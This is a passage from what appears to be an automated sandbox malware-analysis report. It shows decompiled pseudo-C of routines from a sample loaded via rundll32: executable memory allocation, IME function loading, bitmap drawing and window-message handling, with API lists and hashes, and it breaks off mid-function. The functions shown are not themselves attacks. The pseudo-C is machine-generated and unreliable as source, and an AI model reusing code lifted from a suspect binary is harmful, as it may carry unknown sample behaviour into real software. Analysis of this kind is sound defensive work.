						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E027F48F0(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x286588c;
						 *0x286588c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x2865888 = _t35;
				}
				_t25 =  *0x286588c;
				 *0x286588c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x286588c;
			}








                          0x027f4906
                          0x027f4916
                          0x027f491b
                          0x027f491d
                          0x027f4922
                          0x027f4924
                          0x027f4931
                          0x027f493b
                          0x027f4943
                          0x027f4946
                          0x027f4946
                          0x027f4949
                          0x027f4949
                          0x027f494c
                          0x027f4956
                          0x027f495b
                          0x027f495e
                          0x027f4960
                          0x027f4967
                          0x027f496e
                          0x027f496e
                          0x027f4976
                          0x027f497b
                          0x027f4980
                          0x027f4986
                          0x027f498d

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 027F4916
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 28f8a588d172eb7afa4d1ffe1fb0d65a43eefac4893601e7bd2c80adf47ebcb8
                          • Instruction ID: de24eb25913a627f9cc3b090a141a886094495ac84ecf8c9cdca5eb6752b059b
                          • Opcode Fuzzy Hash: 28f8a588d172eb7afa4d1ffe1fb0d65a43eefac4893601e7bd2c80adf47ebcb8
                          • Instruction Fuzzy Hash: C41148386443459FC711DF19D884B43B7E5EB48360F10852AEA988F785D370E8158BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 02838884 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E02838884() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x2864798; // 0x2865748
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x28389ea);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x2865be8 == 0) {
						 *0x2865be8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x2863fe8 == 0) {
						 *0x2863fe8 = LoadLibraryA("imm32.dll");
						if( *0x2863fe8 != 0) {
							_t11 =  *0x2863fe8; // 0x0
							 *0x2865bec = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x2863fe8; // 0x0
							 *0x2865bf0 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x2863fe8; // 0x0
							 *0x2865bf4 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x2863fe8; // 0x0
							 *0x2865bf8 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x2863fe8; // 0x0
							 *0x2865bfc = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x2863fe8; // 0x0
							 *0x2865c00 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x2863fe8; // 0x0
							 *0x2865c04 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x2863fe8; // 0x0
							 *0x2865c08 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x2863fe8; // 0x0
							 *0x2865c0c = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x2863fe8; // 0x0
							 *0x2865c10 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x28389f1);
					return SetErrorMode(_v8);
				}
			}


















                          0x02838885
                          0x02838889
                          0x02838892
                          0x028389f4
                          0x02838898
                          0x028388a2
                          0x028388a7
                          0x028388a8
                          0x028388ad
                          0x028388b0
                          0x028388ba
                          0x028388d3
                          0x028388d3
                          0x028388df
                          0x028388ef
                          0x028388fb
                          0x02838906
                          0x02838911
                          0x0283891b
                          0x02838926
                          0x02838930
                          0x0283893b
                          0x02838945
                          0x02838950
                          0x0283895a
                          0x02838965
                          0x0283896f
                          0x0283897a
                          0x02838984
                          0x0283898f
                          0x02838999
                          0x028389a4
                          0x028389ae
                          0x028389b9
                          0x028389c3
                          0x028389ce
                          0x028389ce
                          0x028388fb
                          0x028389d5
                          0x028389d8
                          0x028389db
                          0x028389e9
                          0x028389e9

                          APIs
                          • SetErrorMode.KERNEL32(00008000), ref: 0283889D
                          • GetModuleHandleA.KERNEL32(USER32,00000000,028389EA,?,00008000), ref: 028388C1
                          • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 028388CE
                          • LoadLibraryA.KERNEL32(imm32.dll,00000000,028389EA,?,00008000), ref: 028388EA
                          • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0283890C
                          • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02838921
                          • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02838936
                          • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0283894B
                          • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02838960
                          • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02838975
                          • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0283898A
                          • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0283899F
                          • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 028389B4
                          • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 028389C9
                          • SetErrorMode.KERNEL32(?,028389F1,00008000), ref: 028389E4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                          • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                          • API String ID: 3397921170-3950384806
                          • Opcode ID: b60c9e97545cff1742b49e3101c3e54d7fd02e3e60814c8e5e60c830cb73793e
                          • Instruction ID: f9ede5badae179f5ed007d9442047b4b8882b46449798a7483d43f4cdf45a159
                          • Opcode Fuzzy Hash: b60c9e97545cff1742b49e3101c3e54d7fd02e3e60814c8e5e60c830cb73793e
                          • Instruction Fuzzy Hash: E931E6BDE84240BEFB12EBA4F84DD253BBAE719B01F402855F401C7A80D67958A0CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FB9F8 Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E027FB9F8(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				struct tagRECT _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E027FB5B4(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							E027F87C4();
						}
						_v28 = E027F88E4(GetDC(0));
						_v32 = E027F88E4(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0x27fc046);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E027D277C(0x42c);
							_push(_t457);
							_push(0x27fbd50);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							memcpy(_v40, _a8 + 0x18, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E027FB9AC(_a8);
										_t104 =  &(_v40->bmiColors); // 0x29
										_t441 = _t104;
										E027D2978(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											SelectObject(_v32, _v24);
										}
									} else {
										_t76 =  &(_v40->bmiColors); // 0x29
										_t441 = _t76;
										E027F9078(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E027F88E4(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								E027F883C(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0x27fbd57);
								return E027D279C(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E027D3B48();
								E027D3B48();
								goto L58;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E027F88E4(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E027F88E4(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E027F88E4(_v20);
							_v24 = E027F88E4(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0x27fbff7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0x27fbfe6);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0x27fbfc4);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E027F7CD8( *((intOrPtr*)(_a4 + 0x14)));
								E027E9BA4(0,  *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
								FillRect(_v32,  &_v156, _t366);
								SetTextColor(_v32, E027F7018( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E027F7018(E027F7C9C( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E027F7018( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E027F7018(E027F7C9C( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(0x27fbfcb);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E027F88E4(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0x27fbf9a);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E027F88E4(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E027F7018( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E027F7018(E027F7C9C( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E027F88E4(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0x27fbfa1);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L58;
					}
				} else {
					L58:
					return _v20;
				}
			}






































                          0x027fb9f9
                          0x027fb9fb
                          0x027fba01
                          0x027fba04
                          0x027fba07
                          0x027fba0a
                          0x027fba0f
                          0x027fba19
                          0x027fba3c
                          0x027fba5b
                          0x027fba62
                          0x027fba69
                          0x027fba82
                          0x027fba82
                          0x027fba93
                          0x027fbaa4
                          0x027fbaa9
                          0x027fbaaa
                          0x027fbaaf
                          0x027fbab2
                          0x027fbabc
                          0x027fbb26
                          0x027fbb2b
                          0x027fbb2c
                          0x027fbb31
                          0x027fbb34
                          0x027fbb3a
                          0x027fbb44
                          0x027fbb52
                          0x027fbb5a
                          0x027fbb67
                          0x027fbb6c
                          0x027fbb73
                          0x027fbb73
                          0x027fbb87
                          0x027fbb92
                          0x027fbb9b
                          0x027fbb9e
                          0x027fbba9
                          0x027fbc79
                          0x027fbc81
                          0x027fbc8c
                          0x027fbc93
                          0x027fbc98
                          0x027fbca0
                          0x027fbca0
                          0x027fbcae
                          0x027fbcae
                          0x027fbc83
                          0x027fbc83
                          0x027fbc8a
                          0x00000000
                          0x00000000
                          0x027fbc8a
                          0x027fbbaf
                          0x027fbbb7
                          0x027fbbe5
                          0x027fbc03
                          0x027fbc16
                          0x027fbc1d
                          0x027fbc52
                          0x027fbc62
                          0x027fbc25
                          0x027fbc37
                          0x027fbc3c
                          0x027fbc3f
                          0x027fbc3f
                          0x027fbc6f
                          0x027fbc6f
                          0x027fbbe7
                          0x027fbbea
                          0x027fbbea
                          0x027fbbf5
                          0x027fbbf5
                          0x027fbbc5
                          0x027fbbc8
                          0x027fbbca
                          0x027fbbd6
                          0x027fbbd6
                          0x027fbbb7
                          0x027fbccf
                          0x027fbcd6
                          0x027fbcd8
                          0x027fbcd8
                          0x027fbce1
                          0x027fbd3c
                          0x027fbd3f
                          0x027fbd42
                          0x027fbd4f
                          0x027fbd06
                          0x027fbd16
                          0x027fbd26
                          0x027fbd2b
                          0x027fbd30
                          0x00000000
                          0x027fbd30
                          0x027fbabe
                          0x027fbad0
                          0x027fbb14
                          0x027fbad2
                          0x027fbaf0
                          0x027fbaf0
                          0x027fbd5a
                          0x027fbd71
                          0x027fbd76
                          0x027fbd77
                          0x027fbd7c
                          0x027fbd7f
                          0x027fbd84
                          0x027fbd85
                          0x027fbd8a
                          0x027fbd8d
                          0x027fbd92
                          0x027fbd95
                          0x027fbd9b
                          0x027fbdac
                          0x027fbdb3
                          0x027fbdb3
                          0x027fbdba
                          0x027fbdbb
                          0x027fbdc0
                          0x027fbdc3
                          0x027fbdca
                          0x027fbea0
                          0x027fbdd0
                          0x027fbdd6
                          0x027fbdf4
                          0x027fbe04
                          0x027fbe1c
                          0x027fbe36
                          0x027fbe43
                          0x027fbe5c
                          0x027fbe6f
                          0x027fbe7e
                          0x027fbe7e
                          0x027fbe43
                          0x027fbea9
                          0x027fbfa3
                          0x027fbfa6
                          0x027fbfa9
                          0x027fbfb2
                          0x00000000
                          0x027fbfbe
                          0x027fbfc3
                          0x027fbeaf
                          0x027fbebd
                          0x027fbec2
                          0x027fbec3
                          0x027fbec8
                          0x027fbecb
                          0x027fbee0
                          0x027fbee6
                          0x027fbef7
                          0x027fbefd
                          0x027fbefd
                          0x027fbf06
                          0x027fbf1b
                          0x027fbf35
                          0x027fbf35
                          0x027fbf5d
                          0x027fbf66
                          0x027fbf6f
                          0x027fbf6f
                          0x027fbf7e
                          0x027fbf85
                          0x027fbf88
                          0x027fbf8b
                          0x027fbf99
                          0x027fbf99
                          0x027fbea9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027fc04d
                          0x027fc04d
                          0x027fc056
                          0x027fc056

                          APIs
                          • GetObjectA.GDI32(00000000,00000054,?), ref: 027FBA78
                          • GetDC.USER32(00000000), ref: 027FBA89
                          • CreateCompatibleDC.GDI32(00000000), ref: 027FBA9A
                          • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 027FBAE6
                          • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 027FBB0A
                          • SelectObject.GDI32(?,?), ref: 027FBD67
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027FBDA7
                          • RealizePalette.GDI32(?), ref: 027FBDB3
                          • SetTextColor.GDI32(?,00000000), ref: 027FBE1C
                          • SetBkColor.GDI32(?,00000000), ref: 027FBE36
                          • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,027FBFC4,?,00000000,027FBFE6,?,00000000,027FBFF7), ref: 027FBE7E
                          • FillRect.USER32(?,?,00000000), ref: 027FBE04
                            • Part of subcall function 027F7018: GetSysColor.USER32(?), ref: 027F7022
                          • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 027FBEA0
                          • CreateCompatibleDC.GDI32(00000028), ref: 027FBEB3
                          • SelectObject.GDI32(?,00000000), ref: 027FBED6
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027FBEF2
                          • RealizePalette.GDI32(?), ref: 027FBEFD
                          • SetTextColor.GDI32(?,00000000), ref: 027FBF1B
                          • SetBkColor.GDI32(?,00000000), ref: 027FBF35
                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 027FBF5D
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 027FBF6F
                          • SelectObject.GDI32(?,00000000), ref: 027FBF79
                          • DeleteDC.GDI32(?), ref: 027FBF94
                            • Part of subcall function 027F7CD8: CreateBrushIndirect.GDI32(?), ref: 027F7D82
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                          • String ID:
                          • API String ID: 1299887459-0
                          • Opcode ID: 6eccdbfa9623b4d5eb08f516dd36a061ee2c685990ed4fb4bf49b2710d407c0c
                          • Instruction ID: 08da6f15e5799e2d22d16a27c8d4494fa3d26f2b9db51c0d143bed55a2c6beab
                          • Opcode Fuzzy Hash: 6eccdbfa9623b4d5eb08f516dd36a061ee2c685990ed4fb4bf49b2710d407c0c
                          • Instruction Fuzzy Hash: BC12F675A04208AFDB55EFA8C889FAEB7B9EB08314F118455FA18EB350C774E941CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281D794 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 406COMMON
                          Download Yara Rule
                          C-Code - Quality: 91%
                          			E0281D794(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				_Unknown_base(*)()* _v28;
				char _v32;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t192;
				signed int _t196;
				struct HWND__* _t197;
				struct HWND__* _t198;
				struct HWND__* _t210;
				struct HWND__* _t219;
				int _t222;
				struct HWND__* _t223;
				struct HWND__* _t231;
				struct HWND__* _t235;
				int _t238;
				int _t241;
				struct HWND__* _t253;
				struct HWND__* _t254;
				struct HWND__* _t259;
				struct HWND__* _t261;
				struct HWND__* _t264;
				struct HWND__* _t268;
				struct HWND__* _t276;
				struct HWND__* _t289;
				struct HWND__* _t292;
				struct HWND__* _t298;
				struct HWND__* _t299;
				struct HWND__* _t303;
				intOrPtr _t317;
				struct HWND__* _t320;
				intOrPtr* _t321;
				struct HWND__* _t329;
				struct HWND__* _t331;
				struct HWND__* _t342;
				intOrPtr* _t347;
				void* _t354;
				void* _t367;
				intOrPtr _t374;
				struct HWND__* _t379;
				intOrPtr _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				intOrPtr _t404;

				_t354 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t403);
				_push(0x281de90);
				_push( *[fs:eax]);
				 *[fs:eax] = _t404;
				 *(_v12 + 0xc) = 0;
				_t192 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t192 < 0) {
					L5:
					E0281D61C(_v8, _t351, _v12, _t401, _t402);
					_t196 =  *_v12;
					__eflags = _t196 - 0x53;
					if(__eflags > 0) {
						__eflags = _t196 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t196 - 0xb020;
							if(__eflags > 0) {
								_t197 = _t196 - 0xb031;
								__eflags = _t197;
								if(_t197 == 0) {
									_t198 = _v12;
									__eflags =  *((intOrPtr*)(_t198 + 4)) - 1;
									if( *((intOrPtr*)(_t198 + 4)) != 1) {
										_t179 = _v12 + 8; // 0xfff025
										 *(_v8 + 0xb0) =  *_t179;
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_pop(_t374);
									 *[fs:eax] = _t374;
									return 0;
								}
								__eflags = _t197 + 0xfffffff2 - 2;
								if(_t197 + 0xfffffff2 - 2 < 0) {
									_t111 = _v12 + 8; // 0xfff025
									 *(_v12 + 0xc) = E0281FB74(_v8,  *_t111,  *_v12) & 0x0000007f;
								} else {
									L101:
									E0281D70C(_t403);
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t210 = _v12;
								__eflags =  *(_t210 + 4);
								if( *(_t210 + 4) != 0) {
									_t169 = _v12 + 8; // 0xfff025
									E0281E5E4(_v8, _t354,  *((intOrPtr*)( *_t169)),  *((intOrPtr*)( *_t169 + 4)));
								} else {
									_t165 = _v12 + 8; // 0xfff025
									E0281E56C(_v8,  *((intOrPtr*)( *_t165)),  *((intOrPtr*)( *_t165 + 4)));
								}
								goto L102;
							}
							_t219 = _t196 - 0xb01a;
							__eflags = _t219;
							if(_t219 == 0) {
								_t222 = IsIconic( *(_v8 + 0x30));
								__eflags = _t222;
								if(_t222 == 0) {
									_t223 = GetFocus();
									_t379 = _v8;
									__eflags = _t223 -  *((intOrPtr*)(_t379 + 0x30));
									if(_t223 ==  *((intOrPtr*)(_t379 + 0x30))) {
										_v24 = E028134A0(0);
										__eflags = _v24;
										if(_v24 != 0) {
											SetFocus(_v24);
										}
									}
								}
								goto L102;
							}
							__eflags = _t219 == 5;
							if(_t219 == 5) {
								L89:
								_t158 = _v12 + 8; // 0xfff025
								_t160 = _v12 + 4; // 0x4408bf8
								E0281E994(_v8,  *_t158,  *_t160);
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t231 = _v8;
							__eflags =  *(_t231 + 0x44);
							if( *(_t231 + 0x44) != 0) {
								_v36 =  *((intOrPtr*)(_v8 + 0x44));
								_t235 = E02833F7C(_v36);
								__eflags = _t235;
								if(_t235 != 0) {
									_t238 = IsWindowEnabled(E02833F7C(_v36));
									__eflags = _t238;
									if(_t238 != 0) {
										_t241 = IsWindowVisible(E02833F7C(_v36));
										__eflags = _t241;
										if(_t241 != 0) {
											 *0x2863c8c = 0;
											_v20 = GetFocus();
											SetFocus(E02833F7C(_v36));
											_t131 = _v12 + 8; // 0xfff025
											_t133 = _v12 + 4; // 0x4408bf8
											E0282E93C(_v36,  *_t133, 0x112,  *_t131);
											SetFocus(_v20);
											 *0x2863c8c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t196 - 0xb000;
						if(__eflags > 0) {
							_t253 = _t196 - 0xb001;
							__eflags = _t253;
							if(_t253 == 0) {
								_t254 = _v8;
								__eflags =  *((short*)(_t254 + 0x10a));
								if( *((short*)(_t254 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t253 == 0x15;
							if(_t253 == 0x15) {
								_t259 = E0281E3FC(_v8, _v12);
								__eflags = _t259;
								if(_t259 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t261 = _v8;
							__eflags =  *((short*)(_t261 + 0x112));
							if( *((short*)(_t261 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t264 = _t196 - 0x112;
						__eflags = _t264;
						if(_t264 == 0) {
							_t25 = _v12 + 4; // 0x4408bf8
							_t268 = ( *_t25 & 0x0000fff0) - 0xf020;
							__eflags = _t268;
							if(_t268 == 0) {
								E0281DF10(_v8);
							} else {
								__eflags = _t268 == 0x100;
								if(_t268 == 0x100) {
									E0281DFFC(_v8);
								} else {
									E0281D70C(_t403);
								}
							}
							goto L102;
						}
						_t276 = _t264 + 0xffffffe0 - 7;
						__eflags = _t276;
						if(_t276 < 0) {
							_t69 = _v12 + 8; // 0xfff025
							_t71 = _v12 + 4; // 0x4408bf8
							_t74 = _v12 + 8; // 0xfff025
							 *(_v12 + 0xc) = SendMessageA( *_t74,  *_v12 + 0xbc00,  *_t71,  *_t69);
							goto L102;
						}
						__eflags = _t276 == 0x1e1;
						if(_t276 == 0x1e1) {
							_t289 = E0280B168(E0280B088());
							__eflags = _t289;
							if(_t289 != 0) {
								E0280B1C4(E0280B088());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t196 - 0x16;
					if(__eflags > 0) {
						__eflags = _t196 - 0x1d;
						if(__eflags > 0) {
							_t292 = _t196 - 0x37;
							__eflags = _t292;
							if(_t292 == 0) {
								 *(_v12 + 0xc) = E0281DED8(_v8);
								goto L102;
							}
							__eflags = _t292 == 0x13;
							if(_t292 == 0x13) {
								_t82 = _v12 + 8; // 0xfff025
								__eflags =  *((intOrPtr*)( *_t82)) - 0xde534454;
								if( *((intOrPtr*)( *_t82)) == 0xde534454) {
									_t298 = _v8;
									__eflags =  *((char*)(_t298 + 0x9e));
